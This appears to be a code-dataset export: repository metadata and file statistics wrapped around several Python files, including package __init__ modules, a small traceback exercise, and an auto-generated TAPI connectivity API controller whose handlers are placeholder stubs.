2022-01-07T18:42:41.000Z
|
rabpro/__init__.py
|
jsta/rabpro
|
44301c6a08c14654b27a3475b89898afca0af329
|
[
"BSD-3-Clause"
] | 4
|
2021-08-09T19:28:53.000Z
|
2021-12-17T21:21:51.000Z
|
from . import elev_profile
from . import merit_utils
from . import core
from .core import profiler
from . import subbasin_stats
from . import subbasins
from . import data_utils
from . import utils
| 21.888889
| 28
| 0.796954
| 29
| 197
| 5.275862
| 0.413793
| 0.457516
| 0.196078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162437
| 197
| 8
| 29
| 24.625
| 0.927273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
74933e3e450af0515d24b33c13fb2740bd9e2acc
| 136
|
py
|
Python
|
Darlington/phase1/python Basic 1/day 11 solution/qtn6.py
|
CodedLadiesInnovateTech/-python-challenge-solutions
|
430cd3eb84a2905a286819eef384ee484d8eb9e7
|
[
"MIT"
] | 6
|
2020-05-23T19:53:25.000Z
|
2021-05-08T20:21:30.000Z
|
Darlington/phase1/python Basic 1/day 11 solution/qtn6.py
|
CodedLadiesInnovateTech/-python-challenge-solutions
|
430cd3eb84a2905a286819eef384ee484d8eb9e7
|
[
"MIT"
] | 8
|
2020-05-14T18:53:12.000Z
|
2020-07-03T00:06:20.000Z
|
Darlington/phase1/python Basic 1/day 11 solution/qtn6.py
|
CodedLadiesInnovateTech/-python-challenge-solutions
|
430cd3eb84a2905a286819eef384ee484d8eb9e7
|
[
"MIT"
] | 39
|
2020-05-10T20:55:02.000Z
|
2020-09-12T17:40:59.000Z
|
#program to print the current call stack.
import traceback
print()
def f1():return abc()
def abc():traceback.print_stack()
f1()
print()
| 17
| 41
| 0.735294
| 21
| 136
| 4.714286
| 0.619048
| 0.282828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.016807
| 0.125
| 136
| 7
| 42
| 19.428571
| 0.815126
| 0.294118
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.166667
| 0.166667
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
|
0
| 7
|
77c7c1e95e732146129cbd092cd17baebc59a11f
| 414
|
py
|
Python
|
chainerui/models/__init__.py
|
chainer/chainerui
|
91c5c26d9154a008079dbb0bcbf69b5590d105f7
|
[
"MIT"
] | 185
|
2017-12-15T09:24:07.000Z
|
2022-01-20T11:20:13.000Z
|
chainerui/models/__init__.py
|
chainer/chainerui
|
91c5c26d9154a008079dbb0bcbf69b5590d105f7
|
[
"MIT"
] | 191
|
2017-12-15T09:14:52.000Z
|
2022-02-17T14:09:19.000Z
|
chainerui/models/__init__.py
|
chainer/chainerui
|
91c5c26d9154a008079dbb0bcbf69b5590d105f7
|
[
"MIT"
] | 29
|
2017-12-15T09:40:45.000Z
|
2022-03-13T11:21:11.000Z
|
from chainerui.models.argument import Argument # NOQA
from chainerui.models.asset import Asset # NOQA
from chainerui.models.bindata import Bindata # NOQA
from chainerui.models.command import Command # NOQA
from chainerui.models.log import Log # NOQA
from chainerui.models.project import Project # NOQA
from chainerui.models.result import Result # NOQA
from chainerui.models.snapshot import Snapshot # NOQA
| 46
| 54
| 0.806763
| 56
| 414
| 5.964286
| 0.232143
| 0.311377
| 0.45509
| 0.482036
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135266
| 414
| 8
| 55
| 51.75
| 0.932961
| 0.094203
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7ae868f58de70a271d801f147bcf6091971a6a23
| 107,733
|
py
|
Python
|
RI/flask_server/tapi_server/controllers/tapi_connectivity_controller.py
|
arthurMll/TAPI
|
e1171bb139c6791a953af09cfc2bc7ad928da73d
|
[
"Apache-2.0"
] | 57
|
2018-04-09T08:56:18.000Z
|
2022-03-23T08:31:06.000Z
|
RI/flask_server/tapi_server/controllers/tapi_connectivity_controller.py
|
arthurMll/TAPI
|
e1171bb139c6791a953af09cfc2bc7ad928da73d
|
[
"Apache-2.0"
] | 143
|
2016-06-08T04:09:54.000Z
|
2018-02-23T10:45:59.000Z
|
RI/flask_server/tapi_server/controllers/tapi_connectivity_controller.py
|
arthurMll/TAPI
|
e1171bb139c6791a953af09cfc2bc7ad928da73d
|
[
"Apache-2.0"
] | 64
|
2018-03-07T07:55:17.000Z
|
2022-03-28T07:14:28.000Z
|
import connexion
import six
from tapi_server.models.inline_object1 import InlineObject1 # noqa: E501
from tapi_server.models.inline_object12 import InlineObject12 # noqa: E501
from tapi_server.models.inline_object13 import InlineObject13 # noqa: E501
from tapi_server.models.inline_object14 import InlineObject14 # noqa: E501
from tapi_server.models.inline_object27 import InlineObject27 # noqa: E501
from tapi_server.models.inline_object6 import InlineObject6 # noqa: E501
from tapi_server.models.tapi_common_bandwidth_profile import TapiCommonBandwidthProfile # noqa: E501
from tapi_server.models.tapi_common_capacity import TapiCommonCapacity # noqa: E501
from tapi_server.models.tapi_common_capacity_value import TapiCommonCapacityValue # noqa: E501
from tapi_server.models.tapi_common_name_and_value import TapiCommonNameAndValue # noqa: E501
from tapi_server.models.tapi_common_service_interface_point_ref import TapiCommonServiceInterfacePointRef # noqa: E501
from tapi_server.models.tapi_common_time_range import TapiCommonTimeRange # noqa: E501
from tapi_server.models.tapi_connectivity_ceplist_connection_end_point import TapiConnectivityCeplistConnectionEndPoint # noqa: E501
from tapi_server.models.tapi_connectivity_connection import TapiConnectivityConnection # noqa: E501
from tapi_server.models.tapi_connectivity_connection_end_point_ref import TapiConnectivityConnectionEndPointRef # noqa: E501
from tapi_server.models.tapi_connectivity_connection_ref import TapiConnectivityConnectionRef # noqa: E501
from tapi_server.models.tapi_connectivity_connectivity_context import TapiConnectivityConnectivityContext # noqa: E501
from tapi_server.models.tapi_connectivity_connectivity_service_ref import TapiConnectivityConnectivityServiceRef # noqa: E501
from tapi_server.models.tapi_connectivity_connectivitycontext_connectivity_service import TapiConnectivityConnectivitycontextConnectivityService # noqa: E501
from tapi_server.models.tapi_connectivity_connectivityservice_end_point import TapiConnectivityConnectivityserviceEndPoint # noqa: E501
from tapi_server.models.tapi_connectivity_context_topologycontext_topology_node_ownednodeedgepoint_cep_list import TapiConnectivityContextTopologycontextTopologyNodeOwnednodeedgepointCepList # noqa: E501
from tapi_server.models.tapi_connectivity_create_connectivity_service import TapiConnectivityCreateConnectivityService # noqa: E501
from tapi_server.models.tapi_connectivity_get_connection_details import TapiConnectivityGetConnectionDetails # noqa: E501
from tapi_server.models.tapi_connectivity_get_connection_end_point_details import TapiConnectivityGetConnectionEndPointDetails # noqa: E501
from tapi_server.models.tapi_connectivity_get_connectivity_service_details import TapiConnectivityGetConnectivityServiceDetails # noqa: E501
from tapi_server.models.tapi_connectivity_get_connectivity_service_list import TapiConnectivityGetConnectivityServiceList # noqa: E501
from tapi_server.models.tapi_connectivity_route import TapiConnectivityRoute # noqa: E501
from tapi_server.models.tapi_connectivity_route_ref import TapiConnectivityRouteRef # noqa: E501
from tapi_server.models.tapi_connectivity_switch import TapiConnectivitySwitch # noqa: E501
from tapi_server.models.tapi_connectivity_switch_control import TapiConnectivitySwitchControl # noqa: E501
from tapi_server.models.tapi_connectivity_switch_control_ref import TapiConnectivitySwitchControlRef # noqa: E501
from tapi_server.models.tapi_connectivity_update_connectivity_service import TapiConnectivityUpdateConnectivityService # noqa: E501
from tapi_server.models.tapi_path_computation_path_ref import TapiPathComputationPathRef # noqa: E501
from tapi_server.models.tapi_topology_cost_characteristic import TapiTopologyCostCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_latency_characteristic import TapiTopologyLatencyCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_link_ref import TapiTopologyLinkRef # noqa: E501
from tapi_server.models.tapi_topology_node_edge_point_ref import TapiTopologyNodeEdgePointRef # noqa: E501
from tapi_server.models.tapi_topology_node_ref import TapiTopologyNodeRef # noqa: E501
from tapi_server.models.tapi_topology_resilience_type import TapiTopologyResilienceType # noqa: E501
from tapi_server.models.tapi_topology_risk_characteristic import TapiTopologyRiskCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_topology_ref import TapiTopologyTopologyRef # noqa: E501
from tapi_server.models.tapi_connectivity_getconnectivityservicelist_output import TapiConnectivityGetconnectivityservicelistOutput # noqa: F401,E501
from tapi_server.models.tapi_connectivity_getconnectivityservicedetails_output import TapiConnectivityGetconnectivityservicedetailsOutput # noqa: F401,E501
from tapi_server.models.tapi_connectivity_getconnectiondetails_output import TapiConnectivityGetconnectiondetailsOutput # noqa: F401,E501
from tapi_server.models.tapi_connectivity_getconnectionendpointdetails_output import TapiConnectivityGetconnectionendpointdetailsOutput # noqa: F401,E501
from tapi_server import util
from tapi_server import database
def data_context_connectivity_context_connectionuuid_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get(uuid, topology_uuid, node_uuid, node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get
returns tapi.connectivity.ConnectionEndPointRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param topology_uuid: Id of connection-end-point
:type topology_uuid: str
:param node_uuid: Id of connection-end-point
:type node_uuid: str
:param node_edge_point_uuid: Id of connection-end-point
:type node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiConnectivityConnectionEndPointRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_get
returns tapi.connectivity.Connection # noqa: E501
:param uuid: Id of connection
:type uuid: str
:rtype: TapiConnectivityConnection
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_lower_connectionconnection_uuid_get(uuid, connection_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_lower_connectionconnection_uuid_get
returns tapi.connectivity.ConnectionRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param connection_uuid: Id of lower-connection
:type connection_uuid: str
:rtype: TapiConnectivityConnectionRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_connectivity_context_connectionuuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_routelocal_id_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get(uuid, local_id, topology_uuid, node_uuid, node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_routelocal_id_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get
returns tapi.connectivity.ConnectionEndPointRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param local_id: Id of route
:type local_id: str
:param topology_uuid: Id of connection-end-point
:type topology_uuid: str
:param node_uuid: Id of connection-end-point
:type node_uuid: str
:param node_edge_point_uuid: Id of connection-end-point
:type node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiConnectivityConnectionEndPointRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_routelocal_id_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectionuuid_routelocal_id_get
returns tapi.connectivity.Route # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param local_id: Id of route
:type local_id: str
:rtype: TapiConnectivityRoute
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_routelocal_id_namevalue_name_get(uuid, local_id, value_name): # noqa: E501
"""data_context_connectivity_context_connectionuuid_routelocal_id_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param local_id: Id of route
:type local_id: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_supported_client_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_supported_client_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param topology_uuid: Id of supported-client-link
:type topology_uuid: str
:param link_uuid: Id of supported-client-link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_get(uuid, switch_control_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_get
returns tapi.connectivity.SwitchControl # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:rtype: TapiConnectivitySwitchControl
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_namevalue_name_get(uuid, switch_control_uuid, value_name): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_resilience_type_get(uuid, switch_control_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_resilience_type_get
returns tapi.topology.ResilienceType # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:rtype: TapiTopologyResilienceType
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_sub_switch_controlconnection_uuidsub_switch_control_switch_control_uuid_get(uuid, switch_control_uuid, connection_uuid, sub_switch_control_switch_control_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_sub_switch_controlconnection_uuidsub_switch_control_switch_control_uuid_get
returns tapi.connectivity.SwitchControlRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param connection_uuid: Id of sub-switch-control
:type connection_uuid: str
:param sub_switch_control_switch_control_uuid: Id of sub-switch-control
:type sub_switch_control_switch_control_uuid: str
:rtype: TapiConnectivitySwitchControlRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_get(uuid, switch_control_uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_get
returns tapi.connectivity.Switch # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param local_id: Id of switch
:type local_id: str
:rtype: TapiConnectivitySwitch
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_namevalue_name_get(uuid, switch_control_uuid, local_id, value_name): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param local_id: Id of switch
:type local_id: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_selected_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get(uuid, switch_control_uuid, local_id, topology_uuid, node_uuid, node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_selected_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get
returns tapi.connectivity.ConnectionEndPointRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param local_id: Id of switch
:type local_id: str
:param topology_uuid: Id of selected-connection-end-point
:type topology_uuid: str
:param node_uuid: Id of selected-connection-end-point
:type node_uuid: str
:param node_edge_point_uuid: Id of selected-connection-end-point
:type node_edge_point_uuid: str
:param connection_end_point_uuid: Id of selected-connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiConnectivityConnectionEndPointRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_selected_routeconnection_uuidroute_local_id_get(uuid, switch_control_uuid, local_id, connection_uuid, route_local_id): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_selected_routeconnection_uuidroute_local_id_get
returns tapi.connectivity.RouteRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param local_id: Id of switch
:type local_id: str
:param connection_uuid: Id of selected-route
:type connection_uuid: str
:param route_local_id: Id of selected-route
:type route_local_id: str
:rtype: TapiConnectivityRouteRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_service_post(tapi_connectivity_connectivitycontext_connectivity_service=None): # noqa: E501
"""data_context_connectivity_context_connectivity_service_post
creates tapi.connectivity.connectivitycontext.ConnectivityService # noqa: E501
:param tapi_connectivity_connectivitycontext_connectivity_service: tapi.connectivity.connectivitycontext.ConnectivityService to be added to list
:type tapi_connectivity_connectivitycontext_connectivity_service: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivitycontext_connectivity_service = TapiConnectivityConnectivitycontextConnectivityService.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_avoid_topologytopology_uuid_get(uuid, topology_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_avoid_topologytopology_uuid_get
returns tapi.topology.TopologyRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of avoid-topology
:type topology_uuid: str
:rtype: TapiTopologyTopologyRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_connectionconnection_uuid_get(uuid, connection_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_connectionconnection_uuid_get
returns tapi.connectivity.ConnectionRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param connection_uuid: Id of connection
:type connection_uuid: str
:rtype: TapiConnectivityConnectionRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_delete
removes tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_get
returns tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiConnectivityConnectivityServiceRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_post(uuid, tapi_connectivity_connectivity_service_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_post
creates tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivity_service_ref: tapi.connectivity.ConnectivityServiceRef to be added to list
:type tapi_connectivity_connectivity_service_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_service_ref = TapiConnectivityConnectivityServiceRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_put(uuid, tapi_connectivity_connectivity_service_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_put
creates or updates tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivity_service_ref: tapi.connectivity.ConnectivityServiceRef to be added or updated
:type tapi_connectivity_connectivity_service_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_service_ref = TapiConnectivityConnectivityServiceRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_cost_characteristic_post(uuid, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_cost_characteristic_post
creates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added to list
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_delete(uuid, cost_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_delete
removes tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_get(uuid, cost_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_get
returns tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:rtype: TapiTopologyCostCharacteristic
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_post(uuid, cost_name, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_post
creates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added to list
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_put(uuid, cost_name, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_put
creates or updates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added or updated
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_delete
removes tapi.connectivity.connectivitycontext.ConnectivityService # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusion_post(uuid, tapi_connectivity_connectivity_service_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusion_post
creates tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivity_service_ref: tapi.connectivity.ConnectivityServiceRef to be added to list
:type tapi_connectivity_connectivity_service_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_service_ref = TapiConnectivityConnectivityServiceRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_delete(uuid, connectivity_service_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_delete
removes tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param connectivity_service_uuid: Id of diversity-exclusion
:type connectivity_service_uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_get(uuid, connectivity_service_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_get
returns tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param connectivity_service_uuid: Id of diversity-exclusion
:type connectivity_service_uuid: str
:rtype: TapiConnectivityConnectivityServiceRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_post(uuid, connectivity_service_uuid, tapi_connectivity_connectivity_service_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_post
creates tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param connectivity_service_uuid: Id of diversity-exclusion
:type connectivity_service_uuid: str
:param tapi_connectivity_connectivity_service_ref: tapi.connectivity.ConnectivityServiceRef to be added to list
:type tapi_connectivity_connectivity_service_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_service_ref = TapiConnectivityConnectivityServiceRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_put(uuid, connectivity_service_uuid, tapi_connectivity_connectivity_service_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_put
creates or updates tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param connectivity_service_uuid: Id of diversity-exclusion
:type connectivity_service_uuid: str
:param tapi_connectivity_connectivity_service_ref: tapi.connectivity.ConnectivityServiceRef to be added or updated
:type tapi_connectivity_connectivity_service_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_service_ref = TapiConnectivityConnectivityServiceRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_point_post(uuid, tapi_connectivity_connectivityservice_end_point=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_point_post
creates tapi.connectivity.connectivityservice.EndPoint # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivityservice_end_point: tapi.connectivity.connectivityservice.EndPoint to be added to list
:type tapi_connectivity_connectivityservice_end_point: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivityservice_end_point = TapiConnectivityConnectivityserviceEndPoint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
